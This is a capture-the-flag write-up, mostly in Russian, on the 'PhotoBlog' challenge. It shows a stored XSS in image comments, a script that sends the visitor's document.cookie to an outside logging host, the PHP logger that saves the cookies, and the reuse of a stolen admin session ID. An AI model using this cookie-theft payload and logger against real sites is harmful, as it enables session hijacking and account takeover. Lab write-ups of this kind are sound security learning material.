Description:
A friend of mine have stolen my cat’s picture on his blog. I want to login as admin user on his blog. Do you have any idea?
The Blog
Вот, что нашел обычным перебором: http://ctf.sharif.edu:33455/chal/PhotoBlog/e96181b51d6f0aa1/login.php
XSS
|
1 |
<script>alert("Hello")</script> |
работает при отправки комментария к картинке!
После обнаружения XSS, на сайте в комментариях разместил скрип:
|
1 2 3 |
<script> document.write('<img src="http://ctf-sandbox.com/cookie/cookie.php?cookie='+ document.cookie +'" />') </script> |
И разместил на сервере скрипт https://ctf-sandbox.com/cookie/cookie.php
|
1 2 3 4 5 6 |
<? $uid=urldecode($_SERVER['QUERY_STRING']); $fp=fopen("log.txt","a"); fputs($fp,"$uid\n"); fclose($fp); ?> |
Скрипт записывает все обращения к нему в log.txt.
После обновления страницы сайта в log.txt появилось это «cookie=PHPSESSID=515386866780b5f132fc96c02b3ddb82»
Подставив cookie (cookie можно подставить с помощью EditThisCookie) и перейдя по ссылке http://ctf.sharif.edu:33455/chal/PhotoBlog/e96181b51d6f0aa1/admin.php
Получаем флаг.